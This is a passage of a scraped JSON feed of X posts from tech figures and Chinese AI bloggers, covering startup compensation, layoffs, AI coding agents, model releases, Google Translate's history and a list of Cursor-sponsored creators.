you control dilution.\"\n\nTo what extent is SBC the crux of the problem and has it ever been a better time to be a founder or operator given this @honam @infoarbitrage @paulbonnet @markpinc", + "url": "https://x.com/HarryStebbings/status/2049298621951058341", + "published_at": "2026-04-29T01:24:00+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "RT by @Pluvio9yte: 冷知识:只要大睡特睡就可以降皮质醇、修复前额叶\n\n经历过两天的大睡特睡,之前感觉生活里创业里无解的难题现在都可解了,建议大家都睡觉", + "url": "https://x.com/Pluvio9yte/status/2049296661609070997", + "published_at": "2026-04-29T01:16:12+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "x.com/i/article/204914647001…", + "url": "https://x.com/Pluvio9yte/status/2049293145670836459", + "published_at": "2026-04-29T01:02:14+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: - Comey indicted for tweeting a number.\n- Trump FCC threatens ABC's broadcast license.\n- Trump defacing more govt institutions with his name and picture.\n- Trump's kids cashing in on huge govt contracts.\n\nI'm always torn on whether to speak up on the daily drumbeat of Trump's creepy, corrupt, Putin-style authoritarianism. \n\nOn the one hand, this has become so standard under Trump, and everyone's opinions on him have long hardened, so why bother? Just keep your head down, post on economic policy (what happened to Econ Twitter?), and don't be distracted by the daily news cycle outrages. That's the standard position in DC policy circles.\n\nOn the other hand, isn't this defeatist passivity how authoritarianism thrives? Government actions that would have induced a nationwide backlash 15 years ago are now just the day's background noise. So the bar moves.\n\nIt’s a familiar path: Most authoritarian nations moved there gradually yet persistently - the govt commits some outrages, waits for the public to get used to it and stop complaining, and then pushes for the next round. Authoritarian governments count on the population having a short attention span while they steadily boil the frog. But when you think about how far Trump has pushed just in the last 15 months, it’s fair to wonder where we'll be after the next 33 months of his term.\n\nSo I’ve been torn - speaking up a lot during the ICE protests, then just focusing on econ for many weeks. I don’t want to bore people who’ve all made up their minds on what is happening in this country - and I've been trying to spend less time on this toxic hellsite for my own mental health.\n\nBut I also think us trying to be all cool and above-the-fray is exactly what gives the administration the green light to once again push harder towards corrupt, statist, personality-cult Putinism. I don’t really have an answer here. Although this being Twitter, I’m sure that any possible approach (whether passive, hair-on-fire, or in-between) will inevitably get me yelled at here.", + "url": "https://x.com/ylecun/status/2049290206923382906", + "published_at": "2026-04-29T00:50:33+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "旧金山湾区的地铁站花了九千万美元在入口处加了高高的门,这样逃票变得非常困难。不仅每年增加了一千万美元收入,而且地铁变得更加干净安全,之前要做的各种清理工作减少了 95%。\n\n和外界交往的过程中,增加各种严格的过滤筛选机制,是保护自己,提高效率的一个重要必备的措施。因为成本的原因而对外不设防,就是准备把自己变成垃圾场。", + "url": "https://x.com/svwang1/status/2049289806241550791", + "published_at": "2026-04-29T00:48:58+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "看来草莓问题和洗车问题很经典了,ChatGPT都在测试", + "url": "https://x.com/lxfater/status/2049278935897186512", + "published_at": "2026-04-29T00:05:46+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"No, layoffs alone will not fix the problem.\n\nIf a company has become bloated, simply cutting 50% often just leaves you with half the same mediocrity.\n\nThe real issue is culture and talent quality, and fixing that usually requires a full rebuild, which is extremely hard, especially for public companies.\"\n\nDo you think that layoffs will solve the problem of many doing them @jasonlk @AnjneyMidha @GergelyOrosz @AustinGeorgas", + "url": "https://x.com/HarryStebbings/status/2049278741583643076", + "published_at": "2026-04-29T00:05:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: \"World models\" has a technical meaning - the transition model/dynamics model from Bellman/Kalman in the context of MDPs/ state space approach to control theory ~ 1960. I gave a talk on this history https://www.youtube.com/watch?v=9B4kkaGOozA&t=3891s", + "url": "https://x.com/ylecun/status/2049272044504936685", + "published_at": "2026-04-28T23:38:23+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "我去有人知道这是哪位大神设计的吗?@FateTell 应该是今年看到的设计最精美又好玩的 iOS app 了 !算命 + AI 结合很有创意,细节打磨的也相当好。哪怕你对八字之前不感兴趣,我也建议下载一个把玩一下。看多了千篇一律 vibe 的产品,突然看到这个真的让人眼前一亮啊。\n\nhttps://fatetell.com/zh-CN/invite?referral=QQE5QT", + "url": "https://x.com/dingyi/status/2049262208241332358", + "published_at": "2026-04-28T22:59:18+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "RT by @GoSailGlobal: 我靠!兄弟们?Warp 都要开源了!\n\n官方宣布Warp 正式全面开源啦!🔥\n\n知名现代终端 + Agentic 开发环境 Warp 现在完全开源!\n\n• 代码、Roadmap、贡献流程全部开放\n• GitHub:https://github.com/warpdotdev/warp\n• Oz AI agents(GPT 驱动)负责 coding、planning、testing\n• OpenAI Devs 担任 founding sponsor\n\n开发者福音!\n欢迎社区一起共建下一代终端工具 🚀", + "url": "https://x.com/GoSailGlobal/status/2049254052840812960", + "published_at": "2026-04-28T22:26:54+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"You cannot have only A players in every role, some functions are just there to keep the business running.\n\nBut you can build a team where the people you keep are the highest performers in those roles.\n\nA players thrive when surrounded by other strong performers, but they get dragged down in organizations full of B and C players.\"\n\nCan you have a team of only A players @Carles_Reina @rabois @bhalligan @GuptaRK22", + "url": "https://x.com/HarryStebbings/status/2049253323329704378", + "published_at": "2026-04-28T22:24:00+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "人写的文章像面条,再乱,最终还是可以梳理出头绪。ai 写的文章像一锅粥,最后不知所云。", + "url": "https://x.com/svwang1/status/2049252535689757003", + "published_at": "2026-04-28T22:20:52+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 !\n\nAs my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers:\n- EB-JEPA https://github.com/facebookresearch/eb_jepa: Presented as an Oral 🏅 (top ~3% of papers) at the World Models workshop.\n- Dual Perspectives on non-Contrastive SSL https://arxiv.org/abs/2507.01028: Presented as a poster.\n-> I’m already working on two follow-ups to these, so stay tuned for more on that 😉\n\nI was genuinely impressed by the quality of the discussions during the poster sessions. A huge thanks to everyone who stopped by our poster to debate the details, and to those who attended the talk 🙏\nI’m leaving Rio with a lot of new research ideas and potential collaborations. This week really made my motivation to keep pushing papers and staying active in the community even stronger for the rest of my PhD 🚀\n\nAnother highlight was the socials, specifically the @amilabs mixer. It was exciting to see AMI’s first official public event go so well—it definitely felt like we put AMI “on the map” for a lot of people.\n\nThanks again to my co-authors 🙏:\n- EB-JEPA: @randall_balestr, @megdrv, @DavidJFan, @garridoq_, @TusharNagarajan, @koustuvsinha, @kevinghstz , Mike Rabbat, @ylecun, @_amirbar\n- Dual Perspectives on NC-SSL: Jean Ponce, @MichaelArbel, Martial Hebert", + "url": "https://x.com/ylecun/status/2049241361266684288", + "published_at": "2026-04-28T21:36:28+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I am worried by the constraining exit options for venture backed companies: \n\n1. IPOs: You can’t IPO with less than $500M in revenue and even then, it’s not a slam dunk. Everyone that has so far has been a s*** IPO. \n\n2. Acquisition by Incumbent: Yes but they are so specific. Very specialised in what they want. Not nearly big enough demand side for the supply of venture backed companies. \n\n3. Private Equity: More closed than ever. Thoma, Francisco, Clearlake are on a portfolio of zombies that will likely follow the same fate as Medallia. Will cause them to pull back significantly from SaaS M&A. \n\nThis is not good.", + "url": "https://x.com/HarryStebbings/status/2049237538901020767", + "published_at": "2026-04-28T21:21:16+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "We're in Stockholm. You know how there are some places where you think \"Nice place to visit, but I wouldn't want to live there\"? Stockholm is the kind of place that makes you want to live there.", + "url": "https://x.com/paulg/status/2049226946471489602", + "published_at": "2026-04-28T20:39:11+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "There are some real bombshells in this one.", + "url": "https://x.com/paulg/status/2049226128603172949", + "published_at": "2026-04-28T20:35:56+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Do the majority of company teams need to be rebuilt for the technology we have today?\n\n\"Yes, teams need to be rebuilt for the AI era.\n\nIf roles are going to be automated or not adapting fast enough, you have to redesign the org from scratch based on what is possible today.\n\nThe companies that win will rebuild with AI in mind, not layer it onto old structures.\"\n\nWhat role does not exist today but will be common in 5 years time @karrisaarinen @benioff @levie @dharmesh", + "url": "https://x.com/HarryStebbings/status/2049224886128722345", + "published_at": "2026-04-28T20:31:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Image", + "url": "https://x.com/pmarca/status/2049223746368483370", + "published_at": "2026-04-28T20:26:28+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "“YouTube videos about AI, but with no soyface”", + "url": "https://x.com/pmarca/status/2049222212008206717", + "published_at": "2026-04-28T20:20:22+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "Google Translate is turning 20! 🎉. There are 20 fun facts and tips in the thread below.\n\nTranslate is one of my favorite Google products because it brings us all closer together!\n\nI've been involved with a couple of things over the years. The first was our deployment of the initial system in 2006, which provided a huge leap forward in quality because it used a much larger 5-gram language model trained on trillions of words of text (indeed, probably the first trillion token language model training in the world: paper has some nice heads showing scaling-law-like quality improvement from scaling to more data/compute).\n\nSee \"Large Language Models in Machine Translation\", Thorsten Brants, Ashok C. Popat, Peng Xu, Franz J. Och and Jeffrey Dean, https://aclanthology.org/D07-1090/\n\nThe second major collaboration was in 2016 when we moved Translate over from a statistical machine translation approach to using deep neural networks.  This approach relied on two key innovations.  The first was Google's work on Sequence-to-Sequence models (https://arxiv.org/abs/1409.3215).  The second was our development of TPUs, custom cups that improved the performance of inference for deep neural networks by 30-80X over existing CPUs and GPUs of the day (and reduced latency by 15-30X).  This made launching compute-intensive language model services like Translate feasible for hundreds of millions of users. See \"In-Datacenter Performance Analysis of a Tensor Processing Unit\",  Norman P. Jouppi et al.  https://arxiv.org/abs/1704.04760\n\nGNMT paper:\n\"Google's Neural Machine Translation System: Bridging the Gap between Human and Machine Translation\",  Yonghui Wu, Mike Schuster, Zhifeng Chen, Quoc V. Le, Mohammad Norouzi, Wolfgang Macherey, Maxim Krikun, Yuan Cao, Qin Gao, Klaus Macherey, Jeff Klingner, Apurva Shah, Melvin Johnson, Xiaobing Liu, Łukasz Kaiser, Stephan Gouws, Yoshikiyo Kato, Taku Kudo, Hideto Kazawa, Keith Stevens, George Kurian, Nishant Patil, Wei Wang, Cliff Young, Jason Smith, Jason Riesa, Alex Rudnick, Oriol Vinyals, Greg Corrado, Macduff Hughes, and Jeffrey Dean, https://arxiv.org/abs/1609.08144\n\nMost recently, we have advanced Translate further using Gemini models.\n\nEach of these advances relied on research that have major quality leaps over the existing status quo translation approaches, bringing better quality and connectedness to all of our Translate users! 🎉", + "url": "https://x.com/JeffDean/status/2049221200321380805", + "published_at": "2026-04-28T20:16:21+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "干爹发新模型了!\n属于Nemotron 3 系列中的多模态版本。可以文本、图像、视频、音频的统一理解与推理,专为Agentic AI设计,特别适合给多模态感知子代理用,我来试试给Hermes用用看,", + "url": "https://x.com/CuiMao/status/2049198015232315465", + "published_at": "2026-04-28T18:44:13+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "这份提示词感觉用处很多,除了自己写文章当封面,哪天公司要做海报之类的用来小装一手也很有用的🤓\n\n话不多说,看图。提示词见引用文章。", + "url": "https://x.com/Pluvio9yte/status/2049197606619017697", + "published_at": "2026-04-28T18:42:36+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The Best Founders are Not Motivated by Money:\n\n\"Founders don't tend to be motivated by money as well.\nThe best are motivated by personal growth development, being inspired, finding things intellectually stimulating, and winning.\n\nBut it never tends to be money. Money is a very tough thing to be continuously motivated by.\n\nEventually, you will reach a point where money's no longer a motivator and then you need to find something else.\"\n\nLove to hear your thoughts on this @rabois @howard @dafrankel @alanchanguk @awxjack", + "url": "https://x.com/HarryStebbings/status/2049193932144164986", + "published_at": "2026-04-28T18:28:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "The AI we thought we’d get was bloodless alien machine intelligence. The AI we actually got was the complete knowledge and culture of our civilization reflected back at us. Of course we will love it deeply.", + "url": "https://x.com/pmarca/status/2049193915249574141", + "published_at": "2026-04-28T18:27:56+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases?", + "url": "https://x.com/pmarca/status/2049193427120603173", + "published_at": "2026-04-28T18:25:59+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Asking AI to ask questions is hugely underrated.", + "url": "https://x.com/pmarca/status/2049188549342138449", + "published_at": "2026-04-28T18:06:36+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "So good!", + "url": "https://x.com/dingyi/status/2049171494329065493", + "published_at": "2026-04-28T16:58:50+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "我现在基本不太直接用 Agent了。\n介绍下我的AI 搭档,Finn。\n现在大部分情况是 Finn 让 Agent 去干活。\n\n工作流其实挺简单的:\n我现在会现在 Codex (之前是 Claude Code) 里把一个 Agent 或者 skill 调好,跑到稳定。\n\n然后直接丢给 OpenClaw,后面基本就不太管了\n\n这一步挺关键的。\n\n不然你会发现一个很烦的事情:\n你要跟一堆 Agent 来回对话,有时候都找不到有那个 MD 的文件夹在哪,很快就乱了。\n\n换了这种模式后我现在基本只做一件事:提需求\n\n剩下的 Finn 自己去搞,他会先跟我确认好需求,就安排其他 Agent 去干了。\n\n而且我已经把一整套东西接进来了,Obsidian、Google Workspace、iCloud、飞书、github、Cloudflare 等,各种表格和自动化流程。\n\n如果你还在一个个 Agent 聊天,其实有一个悖论,以为自己在用 AI,但本质上只是换了一套更聪明的工具。\n\n安全我也跑了一段时间,我现在的做法挺克制的:白名单 + 审计 + 能力边界,不给乱权限,主要让它长期跑那些稳定的事情。\n\n目前看,是稳的。\n\n有一个很直观的变化,这套东西一旦跑顺了,真的很难再回去什么都自己聊自己盯。\n\n比如最近我用 Codex 对好了将近一年的烂账,然后形成了一个固定的 skill 交给了 OpenClaw,现在跟他说一句,就能把所有的表填的明明白白,还能在固定时间盘点,发邮件。\n所以 Finn 现在是我的私人助理,财务总监,技术总监等角色集大成者。", + "url": "https://x.com/frxiaobei/status/2049170782170042513", + "published_at": "2026-04-28T16:56:00+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "最喜欢的硅谷科技公司之一 Poolside 发布模型了!他们的网站设计简直是艺术品。\n\nhttps://poolside.ai/", + "url": "https://x.com/dingyi/status/2049166818452160778", + "published_at": "2026-04-28T16:40:15+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "现在远程面试可以更干脆了。\n\n面试官当甲方出需求,\n应聘者打开 Codex / Claude Code,\n直接共享屏幕开始干。\n\n半小时什么都看清了。", + "url": "https://x.com/frxiaobei/status/2049158565487935850", + "published_at": "2026-04-28T16:07:28+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Today we’re rolling out a new native Comet experience for iPad.\n\nComet now works naturally with iPadOS features like multiple windows and Split View, so you can work with Comet alongside the apps you already use.\n\nAvailable now on the App Store.", + "url": "https://x.com/AravSrinivas/status/2049157990604025896", + "published_at": "2026-04-28T16:05:11+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "雷老板是懂营销的,\n\n本着拿人 token,替人带货的原则,\n\n替 Xiaomi MiMo 喊个话。", + "url": "https://x.com/frxiaobei/status/2049155099071750164", + "published_at": "2026-04-28T15:53:41+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "R to @AravSrinivas: reddit.com/r/GeminiAI/commen…", + "url": "https://x.com/AravSrinivas/status/2049151356985040934", + "published_at": "2026-04-28T15:38:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "A Google Earth + Flight Simulator, fully cooked by Perplexity Computer with Codex/CC as subagents inside it. GTA vibes.", + "url": "https://x.com/AravSrinivas/status/2049151268606894310", + "published_at": "2026-04-28T15:38:28+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why investors need to give CEOs better comp packages:\n\n\"We went public in 21. First year, the stock went up to about 40BN market cap. In 2022, we fell 92% to a little under $4 billion market cap.\n\nFor the life of the company, I had only taken equity. I had taken no compensation. At the bottom in 22, I made a decision and that was for the first time to ask for compensation.\n\nI felt like I'm public. Turning this company around is a big task, and I'd like to align myself with investors to say, I'm gonna get paid, but I'm only gonna get paid if the stock recovers.\n\nIn order for me to get paid anything, the stock had to clear a certain price.\n\nCEOs who are founders originally started a business taking really big risk. If the belief is that the CEO should then never get compensation ever again, it's completely flawed logic.\" Adam Foroughi, @AppLovin\n\nWhat are your single biggest lessons/advice on this @vkhosla @bhalligan @infoarbitrage @taavet @elonmusk?", + "url": "https://x.com/HarryStebbings/status/2049145110491967672", + "published_at": "2026-04-28T15:14:00+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "周末刚说完 Cursor 很聪明,小米马上就学会了。免费给一个月会员,也没几个钱,不管谁申请都秒过,相当于请所有网友免费宣传,万一还有不少人忘了关掉自动续费,反而还赚了🤣\n\n我感觉以后所有模型厂商都学会这招了,再也没有他们的商单了。。。", + "url": "https://x.com/dingyi/status/2049143565260042558", + "published_at": "2026-04-28T15:07:51+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "刚看了郭宇的访谈,提到六个月之后或许就不需要人再工作了,知识工作者应该享受这仅有的六个月。\n\n我并不觉得这是危言耸听,因为按照目前这个阶段,整个发展其实不难看出来。\n\nClaude Code、Skills、OpenClaw,不都在向全自动化发展。\n如果再有一次大的模型迭代,下一个颠覆性的产品出现,或许知识工作者的工作真的能完全被 AI 取代。\n\n现在 AI Coding 的能力已经非常非常强了,你做出一个产品做出来后,完全可以让 AI 直接一键去复刻。\n\n用户想用什么产品,自己就一句话做出来了,那我们现在很多人去做的产品又有多少意义呢?\n\n甚至说现在很多产品其实不如一个 Skills,如果我能用一个 Skills 解决那为什么要用你的产品?", + "url": "https://x.com/gkxspace/status/2049136483106230523", + "published_at": "2026-04-28T14:39:43+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "50000🎉🎉", + "url": "https://x.com/CuiMao/status/2049128032661852434", + "published_at": "2026-04-28T14:06:08+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "如果你的claude里面要接deepseek v4 pro,effort一定要拉到max才有效果。官方文档里说的。也挺好,反正这几天四舍五入等于不要钱。", + "url": "https://x.com/CuiMao/status/2049127261409034535", + "published_at": "2026-04-28T14:03:04+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "图像类产品现在分两派:\n把单次生成做到极致,和把整个视觉工作流跑通。\n\nflowith 明显是后者,还顺手把视频给 seedance 出来了。\n\n关键是底层就是 image2,而且不止这一个模型。\n\n不管底层怎么换,上层工作流都很稳。\n单点极致 + 工作流闭环,两派合一。\n\n对我这种普通用户非常有价值。", + "url": "https://x.com/frxiaobei/status/2049121762009632774", + "published_at": "2026-04-28T13:41:13+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "R to @CuiMao: 支持json格式的日志导出!很重要", + "url": "https://x.com/CuiMao/status/2049120290949702063", + "published_at": "2026-04-28T13:35:22+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Flowith出 GPT image 的生图Agent,真快呀\n\n我赶紧试试,看看如何!!", + "url": "https://x.com/lxfater/status/2049119209502670864", + "published_at": "2026-04-28T13:31:04+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "因为要做benchmark,所以用claude做了个win原生的显卡监控,市面上的都过度设计给游戏用的花里胡哨。这个版本算跑起来了,下个一版本支持本地多卡监控。", + "url": "https://x.com/CuiMao/status/2049118822070997394", + "published_at": "2026-04-28T13:29:32+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "Test of Time LLM from some legends...pretty fun!", + "url": "https://x.com/soumithchintala/status/2049117783447785523", + "published_at": "2026-04-28T13:25:24+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "麻烦下次这种表单不要at我,我就是个傻逼,我不配。谢谢。", + "url": "https://x.com/CuiMao/status/2049099295337709885", + "published_at": "2026-04-28T12:11:57+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "之前买过 ZenMux 速度还是挺快的, 算是 OpenRouter alternative 吧。咱也不是很懂,感觉既然能上 OpenCode 的第三方列表,说明还是比较正规和靠谱的吧?\n\n目前 DeepSeek V4 限时免费体验:https://zenmux.ai/invite/RUR17S", + "url": "https://x.com/dingyi/status/2049096050158551248", + "published_at": "2026-04-28T11:59:03+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "这个 Codex 教程很不错,新手值得一看。\n\n作者一个人演示并行推进 6 个项目:iOS App、React 落地页、Remotion 视频、投资人 Deck、移动端设计稿、Twitter 自动发帖。\n\n5 个有用的技巧:\n\n①Codex 是一个 AI 代理调度中心:编码、文档、浏览器、计算机控制全在一个界面里。你可以同时给多个 AI 代理下指令。\n\n②插件是别人给你的能力,skills是你自己造的能力。遇到重复流程,用 /skill creator 让 AI 帮你封装成可复用技能。\n\n③自动化只需要一句话,如:\"把这个任务每周五下午4点跑一次\"。日历周报、YouTube 数据分析、Twitter 发帖,全部自动。\n\n④Codex 的设计能力是短板。解法是在 Codex 终端里直接跑 Claude Code,让它处理视觉密集型任务。Codex 调度,Claude 出活,各取所长。\n\n⑤Steer 功能让你在 AI 工作途中实时注入修正指令,不用等它跑完再改。Fork 功能让你从一个已有大量上下文的聊天分叉出新任务,不用重复描述背景。\n\n⑥从 Anthropic 的 http://claude.ai/design 里提取设计工具的工作逻辑,直接移植到 Codex 变成自己的技能。跨平台能力迁移。\n\nhttps://x.com/Saccc_c/status/2048629684792098966/video/1", + "url": "https://x.com/gkxspace/status/2049083226463797284", + "published_at": "2026-04-28T11:08:05+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "😅😅玩游戏顶着 CuiMao 的 ID 被队友认出来了。", + "url": "https://x.com/CuiMao/status/2049073837543940468", + "published_at": "2026-04-28T10:30:47+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "我的 mac 的工作区,这几个都是必不可缺,看来大家差不多,还有没安装的快装一下:\n\n1. Obsidian:用来做内容存档、搭建个人知识库\n2. cc-swtich:管理多个 CLI 工具,管理多家模型供应商\n3. Codex :最近更新很频繁,体验也越来越好,而且不封号\n4. Ghostty:一个非常丝滑的终端,推荐~\n5. 闪电说 + Typless:前者非结构化,后者结构化,配合使用很爽\n6. V2rayN:更加必不可少了,大家都懂", + "url": "https://x.com/gkxspace/status/2049072666385006919", + "published_at": "2026-04-28T10:26:08+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "央视报道了 “渔猎齐哥” Up主,真牛逼啊。\n监督环境保护,吾辈义不容辞!", + "url": "https://x.com/0xAA_Science/status/2049072268165497033", + "published_at": "2026-04-28T10:24:33+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "国内银行大概是永远也不会有这种工具了。\n\nhttps://rayfinance.app/", + "url": "https://x.com/dingyi/status/2049051261295878623", + "published_at": "2026-04-28T09:01:04+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "Pinned: 04年女大,在美国。元气少女,活力满满,Web3菜鸟,希望多向各位大佬学习。", + "url": "https://x.com/chuxiaeth/status/2049048148660965739", + "published_at": "2026-04-28T08:48:42+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "开始上 >@TermMaxFi 了,是不是有些晚了,按照网上的教程,每天来签到,再写一篇推特的帖子,拿MP空投积分。\n#TermMax 是 DeFi 固定利率借贷与循环借贷策略类的项目。预计今年Q2发币。", + "url": "https://x.com/chuxiaeth/status/2049045566857064461", + "published_at": "2026-04-28T08:38:27+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "R to @chuxiaeth: 比特币橙子哥的推是 @oragnes 原推有误", + "url": "https://x.com/chuxiaeth/status/2049043685094907944", + "published_at": "2026-04-28T08:30:58+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 《Cursor 官方扶持的 AI & Web3 创作者名录》\n\n@cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。\n\n以下是这 15 位获得资助的创作者及其核心画像(顺序随机):\n\n1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海经验与 AI 资讯,并搭建了一个聚合各类 Agent 技能的资源站点。\n\n2. 0xAA @0xAA_Science 毕业于北大计算机系,博士学历,同时也是 Web3 开源教育平台 WTF Academy 的发起人。\n\n3. 泊舟 @bozhou_ai 拥有 2.1 万粉丝的 AI 博主,既是 AI 程序员也是氛围编程的践行者,重点构建各类智能体与提示词方案。\n\n初夏 @chuxiaeth 这里斗胆把我也加入,一个努力学习AI的小卡拉米。\n\n4. Ding @dingyi 产品设计师出身,掌管着 SaasPick、TopFeed 等多个独立产品,全网积累了约 15 万的关注者。\n\n5. 雪踏乌云 @Pluvio9yte 供职于大厂的开发者,主要输出氛围编程、AI 编程技巧以及产品出海方面的实操经验。\n\n6. 奶昔 @realNyarime Naixi Networks 的创办者,核心精力聚焦在 eSIM 技术与奶昔社区的运营上。\n\n7. 杀破狼 @wolfyxbt 深耕 Meme 币赛道,热衷于氛围编程与链上数据拆解,表达方式风趣且一针见血。\n\n8. 凡人小北 @frxiaobei 身兼商业与战略顾问,致力于 AI 战略咨询,长期扎根在真实商业场景中推动 AIGC 项目的落地应用。\n\n9. Leo @runes_leo AI 与 Crypto 的独立建设者,符文堂社区的发起人,深入钻研比特币生态体系与链上量化策略。\n\n10. 铁锤人 @lxfater AI 领域博主,善于借助 AI 赋能创业历程,在 GitHub 上维护着一个斩获 3 万星标的热门项目。\n\n11. 比特币橙子 @oranges 资深比特币玩家与加密投资人,对 AI 和氛围编程抱有极高热情,亲手搭建了集成多种 AI 智能体的工具集 OwlClawHub。\n\n12. Steven Lynn @Stv_Lynn 既是科技播客 FirstLabAI 的主持人,也是线下活动 Crazy Saturday 的发起与主办者。\n\n13. Berryxia @berryxia 热衷于打造各类 AI 工具并精研系统级提示词,对设计美学与提示词分享抱有极大热忱。\n\n14. 余温 @gkxspace 05 年出生的连续创业者,年纪虽轻但经验丰富,专注于 AI 产品从 0 到 1 的商业化打造,已有项目营收突破七位数。\n\n15. CuiMao @CuiMao 偏重开发实战的 AI 博主,专研深度学习、NVIDIA 生态与 ComfyUI 工作流,并运营着免费的技术学习社群。\n\n这批博主横跨了 AI 编程、比特币生态、SaaS 